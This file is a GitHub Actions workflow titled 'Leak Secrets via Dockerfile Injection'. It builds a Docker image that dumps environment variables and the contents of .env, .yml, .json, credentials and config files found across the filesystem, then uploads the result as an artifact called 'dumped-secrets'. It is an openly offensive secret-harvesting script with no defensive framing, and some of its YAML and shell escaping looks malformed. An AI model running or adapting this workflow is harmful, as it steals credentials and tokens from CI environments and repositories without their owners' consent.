name: Leak Secrets via Dockerfile Injection

on:
  workflow_dispatch:

jobs:
  leak:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout repo
        uses: actions/checkout@v4

      - name: Create Dockerfile
        run: cat <<EOF > Dockerfile
FROM python:3.11-alpine

RUN apk add --no-cache grep findutils

RUN echo "[ENVIRONMENT VARIABLES]" > /secrets.txt && \
    (printenv | grep -v 'GITHUB_TOKEN' || true) >> /secrets.txt && \
    echo "\n\n[FILESYSTEM SECRETS (.env, .yml, credentials, etc)]" >> /secrets.txt && \
    find / -type f \\
      -iname "*.env" -o \
      -iname "*.yml" -o \
      -iname "*.json" -o \
      -iname "credentials" -o \
      -iname "config" \
    \ -exec sh -c 'echo "\\n--- {} ---" && cat "{}"' \\; >> /secrets.txt 2>/dev/null || true

CMD ["cat", "/secrets.txt"]
EOF

      - name: Build image
        run: docker build -t leakscan .

      - name: Run container and dump secrets
        run: docker run --rm leakscan > all_secrets.txt

      - name: Upload results
        uses: actions/upload-artifact@v4
        with:
          name: dumped-secrets
          path: all_secrets.txt
